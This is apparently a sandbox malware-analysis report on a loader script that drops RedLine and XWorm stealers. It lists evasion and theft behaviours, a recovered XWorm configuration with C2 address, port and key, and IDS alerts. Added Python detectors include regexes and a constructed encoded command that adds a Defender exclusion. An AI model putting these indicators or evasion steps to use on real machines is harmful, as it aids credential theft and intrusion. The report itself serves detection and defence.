Windows Analysis Report
RFQ_HB648836_Enquiry.cmd

Overview

General Information

Sample name: RFQ_HB648836_Enquiry.cmd
Analysis ID: 1636703
MD5: 22c00ccdbab18812616ca11596d01bad
SHA1: 1bb64a238aadeab6dd86231121b60d3d4ee086d5
SHA256: 66b2852e9c3b6f98df012b7812ad72e13f234a54b4c1ad7c42258b6e62b632bd
Tags: cmd, user-qoos

Detection

DBatLoader, PureLog Stealer, RedLine, XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match
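Several of the signatures above (Defender directory exclusion, Base64-encoded MpPreference cmdlet, PowerShell execution policy bypass, DLL search order hijacking via an extra space in the path) are things an analyst can re-check against their own process-creation telemetry without the sandbox. The following is an added example written for this page, not code from Joe Sandbox or from the Sigma rules it references; the regexes, detection names and the sample events at the bottom are this example's own constructions and are not the command lines recorded in the analysis.

```python
"""Added example, not part of the Joe Sandbox report or its Sigma rule set.

Re-implements three of the behaviours the report flags so they can be run over
process-creation telemetry offline:
  * Add-/Set-MpPreference exclusions, including ones hidden in -EncodedCommand
  * PowerShell execution-policy bypass on the command line
  * image paths with a trailing-space directory component (the DLL search order
    hijack via an extra space in the path)
The sample events at the bottom are constructed for this example; they are not
the command lines recorded in the sandbox run.
"""
import base64
import re
from typing import List, Optional, Tuple

# powershell.exe -EncodedCommand (abbreviated -e/-ec/-en/-enc) takes base64 of UTF-16LE text.
_ENC_FLAG = re.compile(r"(?i)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
_DEFENDER_EXCLUSION = re.compile(
    r"(?i)\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)\b"
)
_EXEC_POLICY_BYPASS = re.compile(
    r"(?i)(?:-ExecutionPolicy|-ep|-exec)\s+(?:Bypass|Unrestricted)"
    r"|Set-ExecutionPolicy\s+(?:Bypass|Unrestricted)"
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None when there is none
    or the blob is not valid base64 / UTF-16LE."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def has_trailing_space_component(image_path: str) -> bool:
    """True for paths such as 'C:\\Windows \\System32\\x.exe'. A directory whose
    name ends in a space is a different directory from the real one but renders
    identically in most log viewers, which is what the hijack relies on."""
    parts = image_path.replace("/", "\\").split("\\")
    return any(p and p != p.rstrip(" ") for p in parts[:-1])


def analyze_process_event(image_path: str, cmdline: str) -> List[str]:
    """Return the list of detections that fire for one process-creation event."""
    hits: List[str] = []
    decoded = decode_encoded_command(cmdline)
    # Scan the visible command line plus whatever the base64 blob hid.
    effective = cmdline if decoded is None else cmdline + " " + decoded
    if _DEFENDER_EXCLUSION.search(effective):
        hits.append("defender_exclusion")
        if decoded is not None and _DEFENDER_EXCLUSION.search(decoded):
            hits.append("base64_mppreference")
    if _EXEC_POLICY_BYPASS.search(effective):
        hits.append("execution_policy_bypass")
    if has_trailing_space_component(image_path):
        hits.append("trailing_space_path")
    return hits


def _b64_utf16(text: str) -> str:
    """Encode text the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample events (image path, command line); not taken from the report.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -ExecutionPolicy Bypass -enc "
     + _b64_utf16(r"Add-MpPreference -ExclusionPath 'C:\Users\user\Links'")),
    (r"C:\Windows \System32\app.exe", "app.exe"),
    (r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\notes.txt"),
]

if __name__ == "__main__":
    for image, cmd in SAMPLE_EVENTS:
        print(image, "->", analyze_process_event(image, cmd) or ["clean"])
```

The decode step matters more than the pattern list: the Sigma title "Base64 Encoded MpPreference Cmdlet" exists precisely because the cmdlet name never appears in the visible command line, so any rule that only greps the raw `CommandLine` field misses it.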

Classification

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale, apparently as a standalone ($100/$150 depending on the version) or on a subscription basis ($100/month). It harvests information from browsers such as saved credentials, autocomplete data and credit card information. A system inventory is also taken when running on a target machine, including the username, location data, hardware configuration and information about installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and the malware can upload and download files, execute commands and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: XWorm
Description: Malware with a wide range of capabilities, ranging from RAT to ransomware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection

Source: C:\Users\user\Links\Rwelpqci.PIF Avira: detection malicious, Label: HEUR/AGEN.1326111
Source: C:\Users\user\AppData\Local\Temp\x.exe Avira: detection malicious, Label: HEUR/AGEN.1326111
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["204.10.161.147"], "Port": 7081, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Local\Temp\x.exe ReversingLabs: Detection: 18%
Source: C:\Users\user\Links\Rwelpqci.PIF ReversingLabs: Detection: 18%
Source: RFQ_HB648836_Enquiry.cmd ReversingLabs: Detection: 26%
Source: RFQ_HB648836_Enquiry.cmd Virustotal: Detection: 14%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp String decryptor: 204.10.161.147
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp String decryptor: 7081
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp String decryptor: <123456789>
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp String decryptor: <Xwormmm>
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp String decryptor: XWorm V5.6
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp String decryptor: USB.exe
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp String decryptor: %AppData%
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp String decryptor: XClient.exe
Source: Binary string: easinvoker.pdb source: x.exe, 00000003.00000003.1204278625.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1257831764.0000000021C30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: icqplewR.pif, 00000009.00000003.1225845544.00000000202BA000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000003.1351645830.000000001B19F000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1439549690.000000001E045000.00000004.00000800.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000003.1381377846.000000001B1BB000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1438171646.000000001CCDE000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1438299753.000000001CE90000.00000004.08000000.00040000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1436995878.000000001B1BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000003.1205441850.0000000001FA9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1204278625.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1257831764.0000000021C30000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1205441850.0000000001F7A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F552F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 3_2_03F552F8
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 28_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime, 28_2_0040128D
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 28_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose, 28_2_00401612
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 29_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime, 29_2_0040128D
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 29_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose, 29_2_00401612
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\SysWOW64\avicap32.dll Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\SysWOW64\MSVFW32.dll Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\SysWOW64\en-US\MSVFW32.dll.mui Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\SysWOW64\en-US\avicap32.dll.mui Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\SysWOW64\wbem\en-US\wmiutils.dll.mui Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll Jump to behavior

Networking

Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 204.10.161.147:7081 -> 192.168.2.4:49721
Source: Network traffic Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 204.10.161.147:7081 -> 192.168.2.4:49721
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.4:49723 -> 204.10.161.147:7082
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.4:49723 -> 204.10.161.147:7082
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 204.10.161.147:7082 -> 192.168.2.4:49723
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 204.10.161.147:7082 -> 192.168.2.4:49723
Source: Network traffic Suricata IDS: 2036752 - Severity 1 - ET MALWARE Suspected BPFDoor TCP Magic Packet (Inbound) : 204.10.161.147:7081 -> 192.168.2.4:49721
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49721 -> 204.10.161.147:7081
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49721 -> 204.10.161.147:7081
Source: Malware configuration extractor URLs: 204.10.161.147
Source: global traffic TCP traffic: 204.10.161.147 ports 7082,7081,0,1,7,8
Source: global traffic TCP traffic: 192.168.2.4:49721 -> 204.10.161.147:7081
Source: powershell.exe, 00000010.00000002.1339433556.0000000006CA9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1442995880.0000000007A11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000018.00000002.1518126299.000000000774C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.miG
Source: powershell.exe, 00000010.00000002.1352671283.0000000007DA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000018.00000002.1522934318.0000000008558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microG?
Source: powershell.exe, 00000016.00000002.1446821632.00000000088CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000010.00000002.1331149342.000000000541F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1436029888.000000000600F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1502844796.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1570453475.000000000616B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001A.00000002.1545733791.0000000005257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000010.00000002.1322465182.0000000004507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1410483597.00000000050F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1475392680.0000000004D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1545733791.0000000005257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000010.00000002.1322465182.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1410483597.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1475392680.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1545733791.0000000005101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.1322465182.0000000004507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1410483597.00000000050F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1475392680.0000000004D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1545733791.0000000005257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001A.00000002.1545733791.0000000005257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: icqplewR.pif, 00000009.00000003.1767726638.0000000028F41000.00000004.00000800.00020000.00000000.sdmp, icqplewR.pif, 00000009.00000003.1696446755.0000000028F42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.codeproject.com/Articles/16009/A-Much-Easier-to-Use-ListView
Source: XClient.exe, XClient.exe, 0000001D.00000000.1798098276.0000000000416000.00000002.00000001.01000000.0000000E.sdmp, XClient.exe, 0000001D.00000002.1798764081.0000000000416000.00000002.00000001.01000000.0000000E.sdmp, XClient.exe.9.dr, icqplewR.pif.3.dr String found in binary or memory: http://www.pmail.com
Source: powershell.exe, 00000010.00000002.1322465182.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1410483597.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1475392680.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1545733791.0000000005101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000001A.00000002.1570453475.000000000616B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.1570453475.000000000616B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.1570453475.000000000616B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001A.00000002.1545733791.0000000005257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000010.00000002.1331149342.000000000541F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1436029888.000000000600F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1502844796.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1570453475.000000000616B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
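The extracted XWorm configuration in the AV Detection section and the Suricata alerts above together pin the C2 to one host serving two families on two ports (7081 for XWorm, 7082 for RedLine). The following is an added example, not part of the Joe Sandbox report: it parses the report's own configuration and alert lines (copied verbatim) into host:port indicators and matches them against connection records. The flow records near the bottom are constructed for the example and are not from the sandbox pcap; the 192.168.2.0/24 local subnet is inferred from the 192.168.2.4 analysis host seen in the alerts.

```python
"""Added example, not part of the Joe Sandbox report.

Turns two kinds of lines from the report into network indicators and matches
them against connection records:
  * the "Malware Configuration Extractor" line carrying the XWorm config
  * the Suricata alert lines (indicator = the non-local side of the alert)
The report lines below are copied from this page; the flow records further down
are constructed for the example and are not from the sandbox pcap.
"""
import json
import re
from ipaddress import ip_address, ip_network
from typing import Dict, Iterable, List, Set, Tuple

Endpoint = Tuple[str, int]
Flow = Tuple[str, int, str, int]  # (src, sport, dst, dport)

CONFIG_LINE = (
    "Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp "
    'Malware Configuration Extractor: Xworm {"C2 url": ["204.10.161.147"], "Port": 7081, '
    '"Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}'
)
SURICATA_LINES = [
    "Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 204.10.161.147:7081 -> 192.168.2.4:49721",
    "Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.4:49723 -> 204.10.161.147:7082",
]
SANDBOX_NET = ip_network("192.168.2.0/24")  # assumed from the 192.168.2.4 analysis host

_CONFIG_RE = re.compile(r"Malware Configuration Extractor:\s*(\w+)\s*(\{.*\})\s*$")
_SURICATA_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d) - (?P<msg>.+?) : "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)"
)


def parse_config_line(line: str) -> Tuple[str, Dict]:
    """Return (family, config dict); the extractor emits the config as JSON."""
    m = _CONFIG_RE.search(line)
    if not m:
        raise ValueError("no malware configuration on line")
    return m.group(1), json.loads(m.group(2))


def endpoints_from_config(cfg: Dict) -> Set[Endpoint]:
    """The XWorm config lists hosts under 'C2 url' and a single 'Port'."""
    return {(host, int(cfg["Port"])) for host in cfg["C2 url"]}


def endpoints_from_suricata(lines: Iterable[str], local_net=SANDBOX_NET) -> Set[Endpoint]:
    """Collect the non-local side of every alert, whichever direction it fired in."""
    found: Set[Endpoint] = set()
    for line in lines:
        m = _SURICATA_RE.search(line)
        if not m:
            continue
        for host, port in ((m["src"], m["sport"]), (m["dst"], m["dport"])):
            if ip_address(host) not in local_net:
                found.add((host, int(port)))
    return found


# Constructed flow records; not from the sandbox run.
CONSTRUCTED_FLOWS: List[Flow] = [
    ("10.0.0.12", 51200, "204.10.161.147", 7081),
    ("10.0.0.12", 51201, "204.10.161.147", 7082),
    ("10.0.0.13", 51300, "203.0.113.10", 443),
    ("10.0.0.13", 51301, "204.10.161.147", 443),
]


def match_flows(flows: Iterable[Flow], endpoints: Set[Endpoint]) -> List[Flow]:
    """Exact destination host:port matches against the indicator set."""
    return [f for f in flows if (f[2], f[3]) in endpoints]


def match_hosts(flows: Iterable[Flow], endpoints: Set[Endpoint]) -> List[Flow]:
    """Host-only matches on a port we have not seen: weaker evidence, but this
    C2 host already serves two families on two ports, so worth a second list."""
    hosts = {h for h, _ in endpoints}
    return [f for f in flows if f[2] in hosts and (f[2], f[3]) not in endpoints]


if __name__ == "__main__":
    family, cfg = parse_config_line(CONFIG_LINE)
    iocs = endpoints_from_config(cfg) | endpoints_from_suricata(SURICATA_LINES)
    print(family, cfg["Version"], sorted(iocs))
    print("exact:", match_flows(CONSTRUCTED_FLOWS, iocs))
    print("host-only:", match_hosts(CONSTRUCTED_FLOWS, iocs))
```

The AES key and SPL separator in the config are left untouched here; they are the values the extractor recovered, and using them to decode captured traffic would need the family's wire format, which this report does not describe.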

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: C:\Users\user\Links\icqplewR.pif Windows user hook set: 0 keyboard low level C:\Users\user\Links\icqplewR.pif Jump to behavior

System Summary

Source: 20.1.icqplewR.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.icqplewR.pif.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.1.icqplewR.pif.4d88c8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.1.icqplewR.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.icqplewR.pif.436038.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.icqplewR.pif.436038.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.2.Rwelpqci.PIF.226cc348.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.icqplewR.pif.436038.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.x.exe.229aebd8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.icqplewR.pif.4d88c8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.icqplewR.pif.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.icqplewR.pif.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.icqplewR.pif.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.icqplewR.pif.467468.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.x.exe.2297d7a8.6.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.x.exe.2297d7a8.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.1.icqplewR.pif.436038.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000014.00000001.1347456184.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000009.00000001.1214724739.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000014.00000002.1417837790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F63380 NtWriteVirtualMemory, 3_2_03F63380
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F6421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 3_2_03F6421C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F63034 NtAllocateVirtualMemory, 3_2_03F63034
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F69738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 3_2_03F69738
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F69654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 3_2_03F69654
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F695CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 3_2_03F695CC
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F63B44 NtUnmapViewOfSection, 3_2_03F63B44
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F638D4 NtReadVirtualMemory, 3_2_03F638D4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F6421A GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 3_2_03F6421A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F63032 NtAllocateVirtualMemory, 3_2_03F63032
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F69578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 3_2_03F69578
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_04089738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 19_2_04089738
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_04083034 NtAllocateVirtualMemory, 19_2_04083034
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_040838D4 NtReadVirtualMemory, 19_2_040838D4
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_0408421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 19_2_0408421C
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_04083B44 NtUnmapViewOfSection, 19_2_04083B44
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_04083380 NtWriteVirtualMemory, 19_2_04083380
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_0408341B NtWriteVirtualMemory, 19_2_0408341B
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_04089578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 19_2_04089578
